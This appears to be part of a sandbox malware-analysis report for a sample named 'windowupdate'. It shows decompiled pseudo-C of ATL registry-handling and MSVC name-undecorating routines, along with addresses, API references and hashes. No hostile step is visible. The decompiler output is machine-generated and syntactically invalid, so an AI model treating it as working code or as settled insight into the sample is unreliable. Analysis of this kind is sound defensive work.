                      										_v56 = E00D38100(__ebx, _v28, _v84, __edi, __esi, _a12, _v84,  &_v1584,  &_v1608);
                      									}
                      								}
                      								__ecx =  &_v2696;
                      								__eax = E00D341C0( &_v2696, 0);
                      								_v8 = 0x12;
                      								__eflags = _v84;
                      								if(_v84 != 0) {
                      									__edx = _a4;
                      									_v2696 = _a4;
                      								} else {
                      									__ecx = _v44;
                      									_v2696 = _v44;
                      								}
                      								__eflags = _v1608;
                      								if(_v1608 == 0) {
                      									__ecx = _v1584;
                      									_v2896 = _v1584;
                      								} else {
                      									__eax = _v1608;
                      									_v2896 = _v1608;
                      								}
                      								__edx = _v2668;
                      								__eax = _v1620;
                      								__ecx = _v2896;
                      								__ecx =  &_v2696;
                      								_v52 = E00D34740(__ecx, __esi, _v2896, _v1620, _v2668);
                      								_v2696 = 0;
                      								__eflags = _v52;
                      								if(__eflags == 0) {
                      									__eax = _v1545 & 0x000000ff;
                      									__eflags = _v1545 & 0x000000ff;
                      									if((_v1545 & 0x000000ff) != 0) {
                      										_v44 = 0;
                      									}
                      									__eflags = _v84;
                      									if(_v84 == 0) {
                      										_v2904 = "default";
                      									} else {
                      										__eflags = _v1608;
                      										if(_v1608 == 0) {
                      											__edx = _v1584;
                      											_v2900 = _v1584;
                      										} else {
                      											__ecx = _v1608;
                      											_v2900 = _v1608;
                      										}
                      										__eax = _v2900;
                      										_v2904 = _v2900;
                      									}
                      									__eflags = _v1596;
                      									if(__eflags == 0) {
                      										__edx = _v1564;
                      										_v2908 = _v1564;
                      									} else {
                      										__ecx = _v1596;
                      										_v2908 = _v1596;
                      									}
                      									__eax = _v2904;
                      									_push(_v2904);
                      									__ecx = _v2908;
                      									__ecx = 0xf237ac;
                      									__eax = E00D3F1F0(0xf237ac);
                      									__ecx =  &_v2812;
                      									E00D323B0( &_v2812, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x311) = E00D323E0(__ebx, __edi, __esi, __eflags, __eax, __eax, 2, "Setting Value %Ts at %Ts\n", _v2908);
                      									_v8 = 0xf;
                      									__ecx =  &_v2696;
                      									__eax = E00D34220( &_v2696, __eflags);
                      									_v8 = 0xe;
                      									__ecx =  &_v2656;
                      									__eax = E00D3DFD0( &_v2656);
                      									_v8 = 0xd;
                      									__ecx =  &_v1584;
                      									__eax = E00D41F30( &_v1584, __eflags);
                      									_v8 = 1;
                      									__ecx =  &_v1564;
                      									__eax = E00D41F30( &_v1564, __eflags);
                      									goto L200;
                      								} else {
                      									__edx = _v52;
                      									_v2804 = E00D32E00(__ecx, __eflags, _v52);
                      									_v8 = 0xf;
                      									__ecx =  &_v2696;
                      									__eax = E00D34220( &_v2696, __eflags);
                      									_v8 = 0xe;
                      									__ecx =  &_v2656;
                      									__eax = E00D3DFD0( &_v2656);
                      									_v8 = 0xd;
                      									__ecx =  &_v1584;
                      									__eax = E00D41F30( &_v1584, __eflags);
                      									_v8 = 1;
                      									__ecx =  &_v1564;
                      									__eax = E00D41F30( &_v1564, __eflags);
                      									_v8 = 0;
                      									__ecx =  &_v124;
                      									__eax = E00D3F220( &_v124);
                      									_v8 = 0xffffffff;
                      									__ecx =  &_v44;
                      									E00D34220(__ecx, __eflags) = _v2804;
                      									goto L206;
                      								}
                      							} else {
                      								__eax =  &_v1596;
                      								__ecx =  &_v1564;
                      								__edx = _v2668;
                      								__eax = _a12;
                      								__ecx = _v28;
                      								__eax = E00D38100(__ebx, _v28, _v2668, __edi, __esi, _a12, _v2668,  &_v1564,  &_v1596);
                      								__eflags = _v1596;
                      								if(_v1596 == 0) {
                      									__ecx = _v1564;
                      									_v1596 = _v1564;
                      								}
                      								__edx = _v1596;
                      								_v2676 = E00D82E00(_v1596);
                      								_v2676 = _v2676 & 0x00000001;
                      								__eflags = _v2676 & 0x00000001;
                      								if(__eflags == 0) {
                      									__eax = _v2676;
                      									asm("cdq");
                      									_v2676 - __edx = _v2676 - __edx >> 1;
                      									_v2668 = _v2676 - __edx >> 1;
                      									_v8 = 0x10;
                      									__ecx = _v2668;
                      									__ecx =  &_v2656;
                      									__eax = E00D3DF80(__ebx,  &_v2656, __eflags, _v2668);
                      									_v8 = 0xf;
                      									__ecx =  &_v2656;
                      									__eax = E00D3DFC0( &_v2656);
                      									__eflags = __eax;
                      									if(__eax != 0) {
                      										__ecx =  &_v2656;
                      										_v1620 = E00D3DFC0( &_v2656);
                      										__edx = _v2668;
                      										_v1620 = E00D4AF80(__edi, _v1620, 0, _v2668);
                      										_v2680 = 0;
                      										while(1) {
                      											__edx = _v2680;
                      											__eflags = _v2680 - _v2676;
                      											if(_v2680 >= _v2676) {
                      												goto L177;
                      											}
                      											_v2680 = _v2680 & 0x00000001;
                      											1 = 1 - (_v2680 & 0x00000001);
                      											__esi = 1 - (_v2680 & 0x00000001) << 2;
                      											_v1596 = _v1596 + _v2680;
                      											__edx =  *(_v1596 + _v2680) & 0x000000ff;
                      											__ecx = _v28;
                      											__eax = E00D37FE0(__ebx, _v28, __edi, __esi,  *(_v1596 + _v2680) & 0x000000ff);
                      											__edi = __al & 0x000000ff;
                      											__ecx = 1;
                      											__edi = (__al & 0x000000ff) << __cl;
                      											__eax = _v2680;
                      											asm("cdq");
                      											_v2680 - __edx = _v2680 - __edx >> 1;
                      											_v1620 =  *(_v1620 + (_v2680 - __edx >> 1)) & 0x000000ff;
                      											__ecx =  *(_v1620 + (_v2680 - __edx >> 1)) & 0x000000ff | __edi;
                      											__eax = _v2680;
                      											asm("cdq");
                      											__eax = _v2680 - __edx;
                      											__eax = _v2680 - __edx >> 1;
                      											__edx = _v1620;
                      											 *(_v1620 + __eax) = __cl;
                      											__ecx = _v2680;
                      											__ecx = _v2680 + 1;
                      											__eflags = __ecx;
                      											_v2680 = __ecx;
                      										}
                      										goto L177;
                      									} else {
                      										_v2800 = 0x8007000e;
                      										_v8 = 0xe;
                      										__ecx =  &_v2656;
                      										__eax = E00D3DFD0( &_v2656);
                      										_v8 = 0xd;
                      										__ecx =  &_v1584;
                      										__eax = E00D41F30( &_v1584, __eflags);
                      										_v8 = 1;
                      										__ecx =  &_v1564;
                      										__eax = E00D41F30( &_v1564, __eflags);
                      										_v8 = 0;
                      										__ecx =  &_v124;
                      										__eax = E00D3F220( &_v124);
                      										_v8 = 0xffffffff;
                      										__ecx =  &_v44;
                      										E00D34220(__ecx, __eflags) = _v2800;
                      										goto L206;
                      									}
                      								} else {
                      									_push("Binary Data does not fall on BYTE boundries\n");
                      									_push(0);
                      									__ecx = 0xf237ac;
                      									_push(E00D3F1F0(0xf237ac));
                      									__ecx =  &_v2792;
                      									_push(E00D323B0( &_v2792, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x2f3));
                      									__eax = E00D323E0(__ebx, __edi, __esi, __eflags);
                      									__esp = __esp + 0x10;
                      									_v2796 = 0x80004005;
                      									_v8 = 0xe;
                      									__ecx =  &_v2656;
                      									__eax = E00D3DFD0( &_v2656);
                      									_v8 = 0xd;
                      									__ecx =  &_v1584;
                      									__eax = E00D41F30( &_v1584, __eflags);
                      									_v8 = 1;
                      									__ecx =  &_v1564;
                      									__eax = E00D41F30( &_v1564, __eflags);
                      									_v8 = 0;
                      									__ecx =  &_v124;
                      									__eax = E00D3F220( &_v124);
                      									_v8 = 0xffffffff;
                      									__ecx =  &_v44;
                      									E00D34220(__ecx, __eflags) = _v2796;
                      									L206:
                      									_push(_t805);
                      									_push(_t769);
                      									E00DC14C0(_t817, 0xd39db8);
                      									_pop(_t771);
                      									_pop(_t810);
                      									 *[fs:0x0] = _v16;
                      									_pop(_t814);
                      									_pop(_t816);
                      									_pop(_t779);
                      									return E00DC1520(E00D47280(_t771, _t779, _v24 ^ _t817, _t810, _t814, _t816), _t817 - _t820 + 0xb58);
                      								}
                      							}
                      					}
                      				}
                      				_t807 =  &(( *_a8)[1]);
                      				__eflags = _t807;
                      				 *_a8 = _t807;
                      				_t805 =  *_a8;
                      				E00D3A0F0(_v28,  *_t805,  &_v72,  &_v84,  &_v96);
                      				_v2816 = _v56;
                      				_v8 = 0;
                      				E00D3F220( &_v124);
                      				_v8 = 0xffffffff;
                      				E00D34220( &_v44, __eflags);
                      				_t769 = _v2816;
                      				goto L206;
                      			}

                      0x00d396ea
                      0x00d396ee
                      0x00d39721
                      0x00d396f0
                      0x00d396f0
                      0x00d396f7
                      0x00d39707
                      0x00d3970d
                      0x00d396f9
                      0x00d396f9
                      0x00d396ff
                      0x00d396ff
                      0x00d39713
                      0x00d39719
                      0x00d39719
                      0x00d3972b
                      0x00d39732
                      0x00d39742
                      0x00d39748
                      0x00d39734
                      0x00d39734
                      0x00d3973a
                      0x00d3973a
                      0x00d3974e
                      0x00d39754
                      0x00d39755
                      0x00d39763
                      0x00d39768
                      0x00d39778
                      0x00d39784
                      0x00d3978c
                      0x00d39790
                      0x00d39796
                      0x00d3979b
                      0x00d3979f
                      0x00d397a5
                      0x00d397aa
                      0x00d397ae
                      0x00d397b4
                      0x00000000
                      0x00d39673
                      0x00d39673
                      0x00d3967f
                      0x00d39685
                      0x00d39689
                      0x00d3968f
                      0x00d39694
                      0x00d39698
                      0x00d3969e
                      0x00d396a3
                      0x00d396a7
                      0x00d396ad
                      0x00d396b2
                      0x00d396b6
                      0x00d396b9
                      0x00d396be
                      0x00d396c5
                      0x00d396cd
                      0x00000000
                      0x00d396cd
                      0x00d394e3
                      0x00d394e3
                      0x00d394ea
                      0x00d394f1
                      0x00d394f8
                      0x00d394fc
                      0x00d394ff
                      0x00d39504
                      0x00d3950b
                      0x00d3951b
                      0x00d39521
                      0x00d3950d
                      0x00d3950d
                      0x00d39513
                      0x00d39513
                      0x00d39527
                      0x00d3952e
                      0x00d39534
                      0x00d39539
                      0x00d3953b
                      0x00d39541
                      0x00d39542
                      0x00d39544
                      0x00d39546
                      0x00d3954c
                      0x00d39551
                      0x00d39552
                      0x00d39558
                      0x00d3955f
                      0x00d39562
                      0x00d39566
                      0x00d395c1
                      0x00d395c7
                      0x00000000
                      0x00d39568
                      0x00d39568
                      0x00d39572
                      0x00d39578
                      0x00d3957d
                      0x00d39581
                      0x00d39587
                      0x00d3958c
                      0x00d39590
                      0x00d39596
                      0x00d3959b
                      0x00d3959f
                      0x00d395a2
                      0x00d395a7
                      0x00d395ae
                      0x00d395b6
                      0x00000000
                      0x00d395b6
                      0x00d39566
                      0x00000000
                      0x00d397e7
                      0x00d397eb
                      0x00d39ccc
                      0x00d39ccc
                      0x00d39cd1
                      0x00d39cd4
                      0x00d39cd7
                      0x00d39cd9
                      0x00d39cdd
                      0x00d39ce1
                      0x00d39ce5
                      0x00d39ce8
                      0x00d39cea
                      0x00d39ced
                      0x00d39cf0
                      0x00000000
                      0x00d39cf0
                      0x00d397f1
                      0x00d397f8
                      0x00d397fc
                      0x00d397fe
                      0x00d39801
                      0x00d39804
                      0x00d39804
                      0x00d3980b
                      0x00d39811
                      0x00d39816
                      0x00d3981a
                      0x00d39820
                      0x00d39825
                      0x00d39829
                      0x00d39833
                      0x00d3983d
                      0x00d39843
                      0x00d39848
                      0x00d3984c
                      0x00d39853
                      0x00d3985a
                      0x00d3985e
                      0x00d39862
                      0x00d3986a
                      0x00d3986d
                      0x00d39871
                      0x00d39aba
                      0x00d39aba
                      0x00d39abe
                      0x00d39ac0
                      0x00d39ac4
                      0x00d39ac6
                      0x00d39acd
                      0x00d39ad4
                      0x00d39ad8
                      0x00d39adc
                      0x00d39ae4
                      0x00d39ae4
                      0x00d39ac4
                      0x00d39ae9
                      0x00d39aef
                      0x00d39af4
                      0x00d39af8
                      0x00d39afc
                      0x00d39b09
                      0x00d39b0c
                      0x00d39afe
                      0x00d39afe
                      0x00d39b01
                      0x00d39b01
                      0x00d39b12
                      0x00d39b19
                      0x00d39b29
                      0x00d39b2f
                      0x00d39b1b
                      0x00d39b1b
                      0x00d39b21
                      0x00d39b21
                      0x00d39b35
                      0x00d39b3c
                      0x00d39b43
                      0x00d39b4a
                      0x00d39b55
                      0x00d39b58
                      0x00d39b62
                      0x00d39b66
                      0x00d39bdc
                      0x00d39be3
                      0x00d39be5
                      0x00d39be7
                      0x00d39be7
                      0x00d39bee
                      0x00d39bf2
                      0x00d39c25
                      0x00d39bf4
                      0x00d39bf4
                      0x00d39bfb
                      0x00d39c0b
                      0x00d39c11
                      0x00d39bfd
                      0x00d39bfd
                      0x00d39c03
                      0x00d39c03
                      0x00d39c17
                      0x00d39c1d
                      0x00d39c1d
                      0x00d39c2f
                      0x00d39c36
                      0x00d39c46
                      0x00d39c4c
                      0x00d39c38
                      0x00d39c38
                      0x00d39c3e
                      0x00d39c3e
                      0x00d39c52
                      0x00d39c58
                      0x00d39c59
                      0x00d39c67
                      0x00d39c6c
                      0x00d39c7c
                      0x00d39c88
                      0x00d39c90
                      0x00d39c94
                      0x00d39c9a
                      0x00d39c9f
                      0x00d39ca3
                      0x00d39ca9
                      0x00d39cae
                      0x00d39cb2
                      0x00d39cb8
                      0x00d39cbd
                      0x00d39cc1
                      0x00d39cc7
                      0x00000000
                      0x00d39b68
                      0x00d39b68
                      0x00d39b74
                      0x00d39b7a
                      0x00d39b7e
                      0x00d39b84
                      0x00d39b89
                      0x00d39b8d
                      0x00d39b93
                      0x00d39b98
                      0x00d39b9c
                      0x00d39ba2
                      0x00d39ba7
                      0x00d39bab
                      0x00d39bb1
                      0x00d39bb6
                      0x00d39bba
                      0x00d39bbd
                      0x00d39bc2
                      0x00d39bc9
                      0x00d39bd1
                      0x00000000
                      0x00d39bd1
                      0x00d39877
                      0x00d39877
                      0x00d3987e
                      0x00d39885
                      0x00d3988c
                      0x00d39890
                      0x00d39893
                      0x00d39898
                      0x00d3989f
                      0x00d398a1
                      0x00d398a7
                      0x00d398a7
                      0x00d398ad
                      0x00d398bc
                      0x00d398c8
                      0x00d398c8
                      0x00d398cb
                      0x00d3995e
                      0x00d39964
                      0x00d39967
                      0x00d39969
                      0x00d3996f
                      0x00d39973
                      0x00d3997a
                      0x00d39980
                      0x00d3998d
                      0x00d3999d
                      0x00d399a3
                      0x00d399a8
                      0x00d399aa
                      0x00d39a09
                      0x00d39a14
                      0x00d39a1a
                      0x00d39a2a
                      0x00d39a32
                      0x00d39a4d
                      0x00d39a4d
                      0x00d39a53
                      0x00d39a59
                      0x00000000
                      0x00000000
                      0x00d39a61
                      0x00d39a69
                      0x00d39a6b
                      0x00d39a74
                      0x00d39a7a
                      0x00d39a7e
                      0x00d39a81
                      0x00d39a86
                      0x00d39a89
                      0x00d39a8b
                      0x00d39a8d
                      0x00d39a93
                      0x00d39a96
                      0x00d39a9e
                      0x00d39aa2
                      0x00d39aa4
                      0x00d39aaa
                      0x00d39aab
                      0x00d39aad
                      0x00d39aaf
                      0x00d39ab5
                      0x00d39a3e
                      0x00d39a44
                      0x00d39a44
                      0x00d39a47
                      0x00d39a47
                      0x00000000
                      0x00d399ac
                      0x00d399ac
                      0x00d399b6
                      0x00d399ba
                      0x00d399c0
                      0x00d399c5
                      0x00d399c9
                      0x00d399cf
                      0x00d399d4
                      0x00d399d8
                      0x00d399de
                      0x00d399e3
                      0x00d399e7
                      0x00d399ea
                      0x00d399ef
                      0x00d399f6
                      0x00d399fe
                      0x00000000
                      0x00d399fe
                      0x00d398d1
                      0x00d398d1
                      0x00d398d6
                      0x00d398d8
                      0x00d398e2
                      0x00d398ed
                      0x00d398f8
                      0x00d398f9
                      0x00d398fe
                      0x00d39901
                      0x00d3990b
                      0x00d3990f
                      0x00d39915
                      0x00d3991a
                      0x00d3991e
                      0x00d39924
                      0x00d39929
                      0x00d3992d
                      0x00d39933
                      0x00d39938
                      0x00d3993c
                      0x00d3993f
                      0x00d39944
                      0x00d3994b
                      0x00d39953
                      0x00d39d79
                      0x00d39d79
                      0x00d39d7c
                      0x00d39d83
                      0x00d39d88
                      0x00d39d89
                      0x00d39d8d
                      0x00d39d95
                      0x00d39d96
                      0x00d39d97
                      0x00d39db2
                      0x00d39db2
                      0x00d398cb
                      0x00000000
                      0x00d387ae
                      0x00d39d2b
                      0x00d39d2b
                      0x00d39d31
                      0x00d39d42
                      0x00d39d4a
                      0x00d39d52
                      0x00d39d58
                      0x00d39d5f
                      0x00d39d64
                      0x00d39d6e
                      0x00d39d73
                      0x00000000

                      APIs
                      Strings
                      • %ls, xrefs: 00D38A77, 00D39D00
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h, xrefs: 00D38A83, 00D39D0C
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Module$CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h
                      • API String ID: 3912913270-4241246472
                      • Opcode ID: 669e9bcda59ea25a71877a9c302724e9bfc2d851f438898e1415790fd1ac6ede
                      • Instruction ID: 4bf226f9a89526e93cf2ce76512c7483e3aee31804eee0ef6c05b687594400aa
                      • Opcode Fuzzy Hash: 669e9bcda59ea25a71877a9c302724e9bfc2d851f438898e1415790fd1ac6ede
                      • Instruction Fuzzy Hash: 45022675A00208EFCB14DF94E891BEEB7B5EF49310F148159F50AAB291DB706E85CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D5A860(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                      				char _v12;
                      				intOrPtr _v16;
                      				char _v20;
                      				char _v28;
                      				char _v36;
                      				char _v44;
                      				char _v52;
                      				char _v60;
                      				char* _t28;
                      				char* _t29;
                      				char* _t30;
                      				intOrPtr _t33;
                      				intOrPtr _t34;
                      				intOrPtr _t36;
                      				char _t43;
                      				char* _t44;
                      				intOrPtr _t45;
                      				intOrPtr _t79;
                      				intOrPtr _t82;
                      				intOrPtr _t83;
                      
                      				_t86 = __esi;
                      				_t85 = __edi;
                      				_t51 = __ebx;
                      				E00D4F3F0( &_v12);
                      				if( *0xf20644 != 0) {
                      					_t28 =  *0xf20644; // 0x0
                      					if( *_t28 != 0x3f) {
                      						L4:
                      						_t29 =  *0xf20644; // 0x0
                      						__eflags =  *_t29 - 0x3f;
                      						if( *_t29 != 0x3f) {
                      							L11:
                      							_t30 =  *0xf20644; // 0x0
                      							__eflags =  *_t30 - 0x3f;
                      							if(__eflags != 0) {
                      								L15:
                      								E00D4F820( &_v12, E00D544C0(_t51, _t85, _t86, __eflags,  &_v60));
                      							} else {
                      								_t33 =  *0xf20644; // 0x0
                      								__eflags =  *((char*)(_t33 + (1 << 0))) - 0x3f;
                      								if(__eflags != 0) {
                      									goto L15;
                      								} else {
                      									_t34 =  *0xf20644; // 0x0
                      									__eflags =  *((char*)(_t34 + (1 << 1))) - 0x40;
                      									if(__eflags != 0) {
                      										goto L15;
                      									} else {
                      										E00D4F920( &_v12, 2);
                      									}
                      								}
                      							}
                      						} else {
                      							_t36 =  *0xf20644; // 0x0
                      							__eflags =  *((char*)(_t36 + (1 << 0))) - 0x24;
                      							if( *((char*)(_t36 + (1 << 0))) != 0x24) {
                      								goto L11;
                      							} else {
                      								E00D4F820( &_v12, E00D58500(_t51, _t85, _t86,  &_v44, 0));
                      								__eflags = E00D5AB70( &_v12) - 2;
                      								if(__eflags == 0) {
                      									L9:
                      									_t79 =  *0xf20644; // 0x0
                      									 *0xf20640 = _t79;
                      									E00D4F820( &_v12, E00D544C0(_t51, _t85, _t86, __eflags,  &_v52));
                      								} else {
                      									_t43 = E00D52290();
                      									__eflags = _t43;
                      									if(_t43 == 0) {
                      										_t44 =  *0xf20640; // 0x0
                      										__eflags =  *_t44;
                      										if(__eflags != 0) {
                      											goto L9;
                      										}
                      									}
                      								}
                      							}
                      						}
                      					} else {
                      						_t45 =  *0xf20644; // 0x0
                      						_t96 =  *((char*)(_t45 + (1 << 0))) - 0x40;
                      						if( *((char*)(_t45 + (1 << 0))) != 0x40) {
                      							goto L4;
                      						} else {
                      							_t82 =  *0xf20640; // 0x0
                      							_t83 = _t82 + 2;
                      							 *0xf20640 = _t83;
                      							_v20 = E00D50060("CV: ", 4);
                      							_v16 = _t83;
                      							E00D4F820( &_v12, E00D4FAA0( &_v36,  &_v20, E00D544C0(__ebx, __edi, __esi, _t96,  &_v28)));
                      						}
                      					}
                      				}
                      				E00D4F240(_a4,  &_v12);
                      				return _a4;
                      			}
























                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D5A869
                      • operator+.LIBVCRUNTIMED ref: 00D5A8D7
                        • Part of subcall function 00D4FAA0: DName::operator+.LIBCMTD ref: 00D4FAC0
                      • Mailbox.LIBCMTD ref: 00D5A8E3
                      • UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 00D5A8C6
                        • Part of subcall function 00D544C0: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 00D544EB
                        • Part of subcall function 00D544C0: Mailbox.LIBCMTD ref: 00D54536
                      • Mailbox.LIBCMTD ref: 00D5A922
                      • UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 00D5A959
                      • Mailbox.LIBCMTD ref: 00D5A965
                      • DName::operator=.LIBVCRUNTIMED ref: 00D5A9B2
                      • Mailbox.LIBCMTD ref: 00D5A9D5
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Mailbox$DecoratedDecorator::getName$Iterator_baseIterator_base::_Name::operator+Name::operator=operator+std::_
                      • String ID: CV:
                      • API String ID: 1608807181-3725821052
                      • Opcode ID: 7abaa992b6723441fa40bd055381cd0dc7cb4714e686731e21834f9652a92e23
                      • Instruction ID: 6c15883454ddf5c672334536c5f3b84cb25c33d4614c671bf5f8cb1d65d85283
                      • Opcode Fuzzy Hash: 7abaa992b6723441fa40bd055381cd0dc7cb4714e686731e21834f9652a92e23
                      • Instruction Fuzzy Hash: CE41E8B29000289BDB24DB54D8A2BBE3FB4EB51302F444169FC175B952DF305949DFB2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00D57B30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				char _v28;
                      				intOrPtr _v32;
                      				char _v36;
                      				intOrPtr _v40;
                      				char _v44;
                      				char _v52;
                      				char _v60;
                      				char _v68;
                      				char _v76;
                      				char _v84;
                      				char _v92;
                      				char _v100;
                      				void* _t37;
                      				intOrPtr _t40;
                      				intOrPtr _t52;
                      				char* _t54;
                      				intOrPtr _t56;
                      				char* _t66;
                      				char* _t67;
                      				char* _t78;
                      				char _t85;
                      				char _t87;
                      				void* _t92;
                      				void* _t93;
                      
                      				E00D4F3F0( &_v28);
                      				_t37 = E00D5A1E0(__ebx, __edi, __esi,  &_v52, 1, 0);
                      				_t93 = _t92 + 0xc;
                      				E00D4F820( &_v28, _t37);
                      				if(E00D5AB70( &_v28) == 0) {
                      					_t78 =  *0xf20640; // 0x0
                      					_t87 =  *_t78;
                      					if(_t87 != 0) {
                      						_t54 =  *0xf20640; // 0x0
                      						_t99 =  *_t54 - 0x40;
                      						if( *_t54 != 0x40) {
                      							_v36 = E00D50060("::", 2);
                      							_v32 = _t87;
                      							_t56 = E00D575A0(__ebx, __edi, __esi, _t99,  &_v60);
                      							_t93 = _t93 + 0xc;
                      							_v8 = _t56;
                      							_v12 = E00D4FB30(_v8,  &_v68,  &_v36);
                      							E00D4F820( &_v28, E00D4FB70(_v12,  &_v76,  &_v28));
                      						}
                      					}
                      				}
                      				_t66 =  *0xf20640; // 0x0
                      				if( *_t66 != 0x40) {
                      					_t67 =  *0xf20640; // 0x0
                      					_t85 =  *_t67;
                      					__eflags = _t85;
                      					if(_t85 == 0) {
                      						_t40 = E00D5A560( &_v28);
                      						__eflags = _t40;
                      						if(_t40 == 0) {
                      							_v44 = E00D50060("::", 2);
                      							_v40 = _t85;
                      							_v16 = E00D4F350( &_v84, 1);
                      							_v20 = E00D4FB30(_v16,  &_v92,  &_v44);
                      							E00D4F820( &_v28, E00D4FB70(_v20,  &_v100,  &_v28));
                      						} else {
                      							E00D4F920( &_v28, 1);
                      						}
                      					} else {
                      						E00D4F920( &_v28, 2);
                      					}
                      				} else {
                      					_t52 =  *0xf20640; // 0x0
                      					 *0xf20640 = _t52 + 1;
                      				}
                      				E00D4F240(_a4,  &_v28);
                      				return _a4;
                      			}
































                      APIs
                      • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D57B39
                      • Mailbox.LIBCMTD ref: 00D57B52
                      • Mailbox.LIBCMTD ref: 00D57BC8
                      • DName::DName.LIBVCRUNTIMED ref: 00D57C35
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      • DName::operator+.LIBCMTD ref: 00D57C48
                      • DName::operator+.LIBCMTD ref: 00D57BBF
                        • Part of subcall function 00D4FB70: Mailbox.LIBCMTD ref: 00D4FB80
                        • Part of subcall function 00D4FB70: Mailbox.LIBCMTD ref: 00D4FB98
                      • DName::operator+.LIBCMTD ref: 00D57BAC
                        • Part of subcall function 00D4FB30: Mailbox.LIBCMTD ref: 00D4FB40
                        • Part of subcall function 00D4FB30: Mailbox.LIBCMTD ref: 00D4FB58
                      • DName::operator=.LIBVCRUNTIMED ref: 00D57BFC
                      • DName::isEmpty.LIBCMTD ref: 00D57C06
                      • DName::operator=.LIBVCRUNTIMED ref: 00D57C14
                        • Part of subcall function 00D575A0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00D575AC
                        • Part of subcall function 00D575A0: Mailbox.LIBCMTD ref: 00D57604
                      • DName::operator+.LIBCMTD ref: 00D57C5B
                      • Mailbox.LIBCMTD ref: 00D57C64
                      • Mailbox.LIBCMTD ref: 00D57C70
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmp
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Mailbox$Name::operator+$Iterator_baseIterator_base::_NameName::operator=std::_$EmptyName::Name::isNode::makeStatus
                      • String ID:
                      • API String ID: 2733737839-0
                      • Opcode ID: 7326a1d907ca757363ebd5488921ce5e20c8377750918a0bcc1aecb1e79d2e44
                      • Instruction ID: 3cbfeac6e9a6bed80c386ced3ba2e0e09c02de972b1b1d73d1f1a8358c23236f
                      • Opcode Fuzzy Hash: 7326a1d907ca757363ebd5488921ce5e20c8377750918a0bcc1aecb1e79d2e44
                      • Instruction Fuzzy Hash: A1416271D041199BDF14EFA4DCA2EFE7B79FF44301F144129E9066A191EB706A49CBB0
                      Uniqueness

                      Uniqueness Score: -1.00%

